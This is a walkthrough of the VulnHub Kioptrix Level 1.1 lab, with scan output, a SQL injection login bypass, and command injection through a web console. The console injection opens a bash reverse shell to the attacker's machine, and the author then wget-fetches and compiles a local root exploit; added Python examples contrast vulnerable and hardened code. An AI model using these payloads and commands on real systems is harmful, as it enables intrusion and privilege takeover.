【WriteUp】Kioptrix Level1.1

Introduction

Another rematch against a box from a while back.

Playing the Kioptrix sequel on my own.

Tools used

nmap

nikto

dirb

Reconnaissance

% nmap -sS -sV -A -T5 -p 1-20000 192.168.3.30

Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-28 11:15 EDT
Nmap scan report for 192.168.3.30
Host is up (0.0012s latency).
Not shown: 9993 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
80/tcp open http Apache httpd 2.0.52 ((CentOS))
111/tcp open rpcbind 2 (RPC #100000)
443/tcp open ssl/https?
631/tcp open ipp CUPS 1.1
784/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:EF:7A:CC (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.49 seconds

Result: the running services are as follows

22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
80/tcp open http Apache httpd 2.0.52 ((CentOS))
111/tcp open rpcbind 2 (RPC #100000)
443/tcp open ssl/https?
631/tcp open ipp CUPS 1.1
784/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)

% dirb http://192.168.3.30

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Mar 28 11:15:48 2020
URL_BASE: http://192.168.3.30/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.3.30/ ----
+ http://192.168.3.30/cgi-bin/ (CODE:403|SIZE:288)
+ http://192.168.3.30/index.php (CODE:200|SIZE:667)
==> DIRECTORY: http://192.168.3.30/manual/
+ http://192.168.3.30/usage (CODE:403|SIZE:285)

---- Entering directory: http://192.168.3.30/manual/ ----
==> DIRECTORY: http://192.168.3.30/manual/de/
==> DIRECTORY: http://192.168.3.30/manual/developer/
==> DIRECTORY: http://192.168.3.30/manual/en/
==> DIRECTORY: http://192.168.3.30/manual/faq/
==> DIRECTORY: http://192.168.3.30/manual/fr/
==> DIRECTORY: http://192.168.3.30/manual/howto/
==> DIRECTORY: http://192.168.3.30/manual/images/
+ http://192.168.3.30/manual/index.html (CODE:200|SIZE:7234)
==> DIRECTORY: http://192.168.3.30/manual/ja/
==> DIRECTORY: http://192.168.3.30/manual/ko/
+ http://192.168.3.30/manual/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/misc/
==> DIRECTORY: http://192.168.3.30/manual/mod/
==> DIRECTORY: http://192.168.3.30/manual/programs/
==> DIRECTORY: http://192.168.3.30/manual/ru/
==> DIRECTORY: http://192.168.3.30/manual/ssl/
==> DIRECTORY: http://192.168.3.30/manual/style/

---- Entering directory: http://192.168.3.30/manual/de/ ----
+ http://192.168.3.30/manual/de/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/de/developer/
+ http://192.168.3.30/manual/de/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/de/faq/
+ http://192.168.3.30/manual/de/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/de/howto/
==> DIRECTORY: http://192.168.3.30/manual/de/images/
+ http://192.168.3.30/manual/de/index.html (CODE:200|SIZE:7317)
+ http://192.168.3.30/manual/de/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/de/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/de/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/de/misc/
==> DIRECTORY: http://192.168.3.30/manual/de/mod/
==> DIRECTORY: http://192.168.3.30/manual/de/programs/
+ http://192.168.3.30/manual/de/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/de/ssl/
==> DIRECTORY: http://192.168.3.30/manual/de/style/

---- Entering directory: http://192.168.3.30/manual/developer/ ----
+ http://192.168.3.30/manual/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.3.30/manual/en/ ----
+ http://192.168.3.30/manual/en/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/en/developer/
+ http://192.168.3.30/manual/en/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/en/faq/
+ http://192.168.3.30/manual/en/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/en/howto/
==> DIRECTORY: http://192.168.3.30/manual/en/images/
+ http://192.168.3.30/manual/en/index.html (CODE:200|SIZE:7234)
+ http://192.168.3.30/manual/en/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/en/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/en/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/en/misc/
==> DIRECTORY: http://192.168.3.30/manual/en/mod/
==> DIRECTORY: http://192.168.3.30/manual/en/programs/
+ http://192.168.3.30/manual/en/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/en/ssl/
==> DIRECTORY: http://192.168.3.30/manual/en/style/

---- Entering directory: http://192.168.3.30/manual/faq/ ----
+ http://192.168.3.30/manual/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.3.30/manual/fr/ ----
+ http://192.168.3.30/manual/fr/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/fr/developer/
+ http://192.168.3.30/manual/fr/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/fr/faq/
+ http://192.168.3.30/manual/fr/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/fr/howto/
==> DIRECTORY: http://192.168.3.30/manual/fr/images/
+ http://192.168.3.30/manual/fr/index.html (CODE:200|SIZE:7234)
+ http://192.168.3.30/manual/fr/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/fr/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/fr/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/fr/misc/
==> DIRECTORY: http://192.168.3.30/manual/fr/mod/
==> DIRECTORY: http://192.168.3.30/manual/fr/programs/
+ http://192.168.3.30/manual/fr/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/fr/ssl/
==> DIRECTORY: http://192.168.3.30/manual/fr/style/

---- Entering directory: http://192.168.3.30/manual/howto/ ----
+ http://192.168.3.30/manual/howto/index.html (CODE:200|SIZE:5685)

---- Entering directory: http://192.168.3.30/manual/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/ja/ ----
+ http://192.168.3.30/manual/ja/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ja/developer/
+ http://192.168.3.30/manual/ja/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ja/faq/
+ http://192.168.3.30/manual/ja/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ja/howto/
==> DIRECTORY: http://192.168.3.30/manual/ja/images/
+ http://192.168.3.30/manual/ja/index.html (CODE:200|SIZE:7227)
+ http://192.168.3.30/manual/ja/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ja/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ja/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/ja/misc/
==> DIRECTORY: http://192.168.3.30/manual/ja/mod/
==> DIRECTORY: http://192.168.3.30/manual/ja/programs/
+ http://192.168.3.30/manual/ja/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ja/ssl/
==> DIRECTORY: http://192.168.3.30/manual/ja/style/

---- Entering directory: http://192.168.3.30/manual/ko/ ----
+ http://192.168.3.30/manual/ko/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ko/developer/
+ http://192.168.3.30/manual/ko/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ko/faq/
+ http://192.168.3.30/manual/ko/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ko/howto/
==> DIRECTORY: http://192.168.3.30/manual/ko/images/
+ http://192.168.3.30/manual/ko/index.html (CODE:200|SIZE:6954)
+ http://192.168.3.30/manual/ko/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ko/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ko/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/ko/misc/
==> DIRECTORY: http://192.168.3.30/manual/ko/mod/
==> DIRECTORY: http://192.168.3.30/manual/ko/programs/
+ http://192.168.3.30/manual/ko/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ko/ssl/
==> DIRECTORY: http://192.168.3.30/manual/ko/style/

---- Entering directory: http://192.168.3.30/manual/misc/ ----
+ http://192.168.3.30/manual/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.3.30/manual/mod/ ----
+ http://192.168.3.30/manual/mod/index.html (CODE:200|SIZE:13437)

---- Entering directory: http://192.168.3.30/manual/programs/ ----
+ http://192.168.3.30/manual/programs/index.html (CODE:200|SIZE:4664)

---- Entering directory: http://192.168.3.30/manual/ru/ ----
+ http://192.168.3.30/manual/ru/de (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ru/developer/
+ http://192.168.3.30/manual/ru/en (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ru/faq/
+ http://192.168.3.30/manual/ru/fr (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ru/howto/
==> DIRECTORY: http://192.168.3.30/manual/ru/images/
+ http://192.168.3.30/manual/ru/index.html (CODE:200|SIZE:7277)
+ http://192.168.3.30/manual/ru/ja (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ru/ko (CODE:301|SIZE:315)
+ http://192.168.3.30/manual/ru/LICENSE (CODE:200|SIZE:11358)
==> DIRECTORY: http://192.168.3.30/manual/ru/misc/
==> DIRECTORY: http://192.168.3.30/manual/ru/mod/
==> DIRECTORY: http://192.168.3.30/manual/ru/programs/
+ http://192.168.3.30/manual/ru/ru (CODE:301|SIZE:315)
==> DIRECTORY: http://192.168.3.30/manual/ru/ssl/
==> DIRECTORY: http://192.168.3.30/manual/ru/style/

---- Entering directory: http://192.168.3.30/manual/ssl/ ----
+ http://192.168.3.30/manual/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.3.30/manual/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/de/developer/ ----
+ http://192.168.3.30/manual/de/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.3.30/manual/de/faq/ ----
+ http://192.168.3.30/manual/de/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.3.30/manual/de/howto/ ----
+ http://192.168.3.30/manual/de/howto/index.html (CODE:200|SIZE:5685)

---- Entering directory: http://192.168.3.30/manual/de/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/de/misc/ ----
+ http://192.168.3.30/manual/de/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.3.30/manual/de/mod/ ----
+ http://192.168.3.30/manual/de/mod/index.html (CODE:200|SIZE:13561)

---- Entering directory: http://192.168.3.30/manual/de/programs/ ----
+ http://192.168.3.30/manual/de/programs/index.html (CODE:200|SIZE:4664)

---- Entering directory: http://192.168.3.30/manual/de/ssl/ ----
+ http://192.168.3.30/manual/de/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.3.30/manual/de/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/en/developer/ ----
+ http://192.168.3.30/manual/en/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.3.30/manual/en/faq/ ----
+ http://192.168.3.30/manual/en/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.3.30/manual/en/howto/ ----
+ http://192.168.3.30/manual/en/howto/index.html (CODE:200|SIZE:5685)

---- Entering directory: http://192.168.3.30/manual/en/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/en/misc/ ----
+ http://192.168.3.30/manual/en/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.3.30/manual/en/mod/ ----
+ http://192.168.3.30/manual/en/mod/index.html (CODE:200|SIZE:13437)

---- Entering directory: http://192.168.3.30/manual/en/programs/ ----
+ http://192.168.3.30/manual/en/programs/index.html (CODE:200|SIZE:4664)

---- Entering directory: http://192.168.3.30/manual/en/ssl/ ----
+ http://192.168.3.30/manual/en/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.3.30/manual/en/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/fr/developer/ ----
+ http://192.168.3.30/manual/fr/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.3.30/manual/fr/faq/ ----
+ http://192.168.3.30/manual/fr/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.3.30/manual/fr/howto/ ----
+ http://192.168.3.30/manual/fr/howto/index.html (CODE:200|SIZE:5685)

---- Entering directory: http://192.168.3.30/manual/fr/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/fr/misc/ ----
+ http://192.168.3.30/manual/fr/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.3.30/manual/fr/mod/ ----
+ http://192.168.3.30/manual/fr/mod/index.html (CODE:200|SIZE:13437)

---- Entering directory: http://192.168.3.30/manual/fr/programs/ ----
+ http://192.168.3.30/manual/fr/programs/index.html (CODE:200|SIZE:4664)

---- Entering directory: http://192.168.3.30/manual/fr/ssl/ ----
+ http://192.168.3.30/manual/fr/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.3.30/manual/fr/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/ja/developer/ ----
+ http://192.168.3.30/manual/ja/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.3.30/manual/ja/faq/ ----
+ http://192.168.3.30/manual/ja/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.3.30/manual/ja/howto/ ----
+ http://192.168.3.30/manual/ja/howto/index.html (CODE:200|SIZE:5607)

---- Entering directory: http://192.168.3.30/manual/ja/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/ja/misc/ ----
+ http://192.168.3.30/manual/ja/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.3.30/manual/ja/mod/ ----
+ http://192.168.3.30/manual/ja/mod/index.html (CODE:200|SIZE:13298)

---- Entering directory: http://192.168.3.30/manual/ja/programs/ ----
+ http://192.168.3.30/manual/ja/programs/index.html (CODE:200|SIZE:4664)

---- Entering directory: http://192.168.3.30/manual/ja/ssl/ ----
+ http://192.168.3.30/manual/ja/ssl/index.html (CODE:200|SIZE:3957)

---- Entering directory: http://192.168.3.30/manual/ja/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/ko/developer/ ----
+ http://192.168.3.30/manual/ko/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.3.30/manual/ko/faq/ ----
+ http://192.168.3.30/manual/ko/faq/index.html (CODE:200|SIZE:3371)

---- Entering directory: http://192.168.3.30/manual/ko/howto/ ----
+ http://192.168.3.30/manual/ko/howto/index.html (CODE:200|SIZE:5299)

---- Entering directory: http://192.168.3.30/manual/ko/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/ko/misc/ ----
+ http://192.168.3.30/manual/ko/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.3.30/manual/ko/mod/ ----
+ http://192.168.3.30/manual/ko/mod/index.html (CODE:200|SIZE:12795)

---- Entering directory: http://192.168.3.30/manual/ko/programs/ ----
+ http://192.168.3.30/manual/ko/programs/index.html (CODE:200|SIZE:4543)

---- Entering directory: http://192.168.3.30/manual/ko/ssl/ ----
+ http://192.168.3.30/manual/ko/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.3.30/manual/ko/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/ru/developer/ ----
+ http://192.168.3.30/manual/ru/developer/index.html (CODE:200|SIZE:4770)

---- Entering directory: http://192.168.3.30/manual/ru/faq/ ----
+ http://192.168.3.30/manual/ru/faq/index.html (CODE:200|SIZE:3564)

---- Entering directory: http://192.168.3.30/manual/ru/howto/ ----
+ http://192.168.3.30/manual/ru/howto/index.html (CODE:200|SIZE:5685)

---- Entering directory: http://192.168.3.30/manual/ru/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.30/manual/ru/misc/ ----
+ http://192.168.3.30/manual/ru/misc/index.html (CODE:200|SIZE:5491)

---- Entering directory: http://192.168.3.30/manual/ru/mod/ ----
+ http://192.168.3.30/manual/ru/mod/index.html (CODE:200|SIZE:13437)

---- Entering directory: http://192.168.3.30/manual/ru/programs/ ----
+ http://192.168.3.30/manual/ru/programs/index.html (CODE:200|SIZE:5016)

---- Entering directory: http://192.168.3.30/manual/ru/ssl/ ----
+ http://192.168.3.30/manual/ru/ssl/index.html (CODE:200|SIZE:3988)

---- Entering directory: http://192.168.3.30/manual/ru/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sat Mar 28 11:33:05 2020
DOWNLOADED: 262884 - FOUND: 102

Result: nothing particularly noteworthy.

% nikto 192.168.3.30

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.3.30
+ Target Hostname: 192.168.3.30
+ Target Port: 80
+ Start Time: 2020-03-28 20:56:51 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.0.52 (CentOS)
+ Retrieved x-powered-by header: PHP/4.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 357810, size: 4872, mtime: Sat Mar 29 13:41:04 1980
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 1 error(s) and 17 item(s) reported on remote host
+ End Time: 2020-03-28 20:58:08 (GMT-4) (77 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Result: nothing particularly noteworthy here either.

Opening it in a regular browser shows what looks like a login page.

[Screenshot: login page]

Gaining access

Trying to get in over SSH.

kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$ ssh 192.168.3.30
kali@192.168.3.30's password:
Permission denied, please try again.
kali@192.168.3.30's password:
Permission denied, please try again.
kali@192.168.3.30's password:
kali@192.168.3.30: Permission denied (publickey,gssapi-with-mic,password).
kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$ ssh admin@192.168.3.30
admin@192.168.3.30's password:
Permission denied, please try again.
admin@192.168.3.30's password:
Permission denied, please try again.
admin@192.168.3.30's password:
admin@192.168.3.30: Permission denied (publickey,gssapi-with-mic,password).
kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$ ssh root@192.168.3.30
root@192.168.3.30's password:
Permission denied, please try again.
root@192.168.3.30's password:
Permission denied, please try again.
root@192.168.3.30's password:
root@192.168.3.30: Permission denied (publickey,gssapi-with-mic,password).
kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$

Since password authentication is enabled, brute forcing would probably work too, but I'll leave that for later.

Trying to get in through the browser

Logging in with a few usernames went nowhere, so

I try SQL injection.

ID: ' OR 1 = 1 --

PW: ' OR 1 = 1 --

Result: the authentication page was bypassed.

The next screen shown is a WebConsole page.

[Screenshot: WebConsole page]
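
The bypass above works because the login page splices the submitted fields straight into its SQL text. The following is an added example, not the Kioptrix application's code: a login check built the vulnerable way next to one using bound parameters, run against a constructed in-memory SQLite table (the `users` schema and its single row are hypothetical, and the password is kept in plain text only to keep the focus on the query). Running it shows the payload from this writeup returning a user row from the first function and nothing from the second.

```python
"""Login check that the ' OR 1 = 1 -- payload bypasses, beside a parameterized
version. Added example, not the Kioptrix application's code; the users table
and its row are constructed for illustration."""
import sqlite3

BYPASS = "' OR 1 = 1 --"   # the payload used in the writeup


def make_db():
    """In-memory table standing in for the target's user store (constructed).
    A real system stores a password hash; plain text here keeps the example
    focused on how the query is built."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'hypothetical-secret')")
    return conn


def login_vulnerable(conn, username, password):
    """String concatenation: the field contents become part of the SQL text,
    so a quote closes the literal and -- comments out the password check."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_hardened(conn, username, password):
    """Bound parameters: the driver passes the fields as data, so they are
    compared literally and never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def demo():
    """Run the payload and a valid credential through both checks."""
    conn = make_db()
    return {
        "vulnerable_bypass": login_vulnerable(conn, BYPASS, BYPASS),
        "hardened_bypass": login_hardened(conn, BYPASS, BYPASS),
        "hardened_valid": login_hardened(conn, "admin", "hypothetical-secret"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, "->", value)
```

With the payload in both fields the vulnerable query degenerates to `WHERE username = '' OR 1 = 1`, which matches every row, while the parameterized query compares the literal string `' OR 1 = 1 --` against the column and finds nothing. The same fix applies to the MySQL backend seen in the port scan: bind the values instead of building the statement from strings.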

 

Following the reverse shell cheat sheet from pentestmonkey,

I try a bash reverse shell.

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

The bash one is this:

bash -i >& /dev/tcp/192.168.3.27/8080 0>&1

On the Kali side, wait for the connection with nc.

% nc -l 192.168.3.27 -p 8080

Then I add a ; to the reverse shell bash line above and execute it.

The browser hangs on loading, and a bash shell comes up on the Kali side.

kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1.1$ nc -l -p 8080
bash: no job control in this shell
bash-3.00$ whoami
apache
bash-3.00$
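
A `;` works on the WebConsole because the submitted field is appended to a command string that a shell then parses, so the field can end one command and begin another. As an added example, not the Kioptrix console's code, the following shows that construction next to a hardened handler that validates the field as a literal IP address and invokes the program through an argv list with no shell. The assumption that the console runs ping against a submitted host is mine, and `INJECTED_FIELD` is a constructed, harmless sample.

```python
"""Command injection in a web console handler, beside a hardened handler.
Added example, not the Kioptrix WebConsole's code; that the console pings a
submitted host is an assumption made for illustration."""
import ipaddress
import shlex
import subprocess

# Constructed sample field: a valid address followed by a chained command.
INJECTED_FIELD = "127.0.0.1; id"


def vulnerable_command_line(host):
    """The vulnerable pattern: the raw form field is concatenated into one
    string that is later handed to a shell (os.system / shell=True)."""
    return "ping -c 1 " + host


def shell_would_run(command_line):
    """Tokenize the string the way a POSIX shell would and split it at ';',
    returning each command the shell would execute in turn."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    commands, current = [], []
    for tok in lexer:
        if tok == ";":
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def validate_host(field):
    """Accept only a literal IPv4/IPv6 address; anything else is rejected
    before it can reach a command."""
    try:
        return str(ipaddress.ip_address(field.strip()))
    except ValueError:
        raise ValueError("host must be a literal IP address") from None


def is_rejected(field):
    """True when the hardened handler refuses the field."""
    try:
        validate_host(field)
    except ValueError:
        return True
    return False


def hardened_argv(field):
    """Build an argv list: every element is exactly one argument and no shell
    ever parses it, so ';', '|' or '$(...)' carry no meaning."""
    return ["ping", "-c", "1", validate_host(field)]


def run_ping(field):
    """What the hardened handler actually calls: subprocess with a list,
    no shell, bounded by a timeout."""
    return subprocess.run(hardened_argv(field), capture_output=True,
                          text=True, timeout=10, check=False).returncode


def demo():
    """Compare both handlers on the constructed injected field."""
    return {
        "vulnerable_commands":
            shell_would_run(vulnerable_command_line(INJECTED_FIELD)),
        "hardened_rejects_injected": is_rejected(INJECTED_FIELD),
        "hardened_clean": hardened_argv("192.168.3.27"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, "->", value)
```

The vulnerable string splits into two commands at the `;`, which is exactly what let the reverse shell line run from the console. The hardened path never builds a string for a shell: the field must parse as an address, and the program receives it as a single argv element. Allow-list validation plus an argv call is the fix; escaping characters such as `;` one by one is not.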

 

Privilege escalation

Looking around with privilege escalation in mind, the following file contains the OS information.

% cat /etc/redhat-release

bash-3.00$ cat redhat-release
CentOS release 4.5 (Final)

To see whether privilege escalation is possible on the listed version,

I searched with searchsploit and found code.

[Screenshot: searchsploit results]

The upper exploit code of the two.

Since this is a local exploit that has to run on the target,

I spin up a simple server on Kali and transfer it.

% python -m SimpleHTTPServer 8080

On the server, move to /tmp and:

% wget http://192.168.3.27:8080/9542.c

Compile and run the transferred code.

gcc -o exploit 9542.c

./exploit

I was able to get all the way to obtaining privileges.

[Screenshot: privilege escalation result]

What's next

・Creating a backdoor

・Study by reading other people's writeups

・Solve it without the tools I used here

and so on, I'd like to do these.

That's all.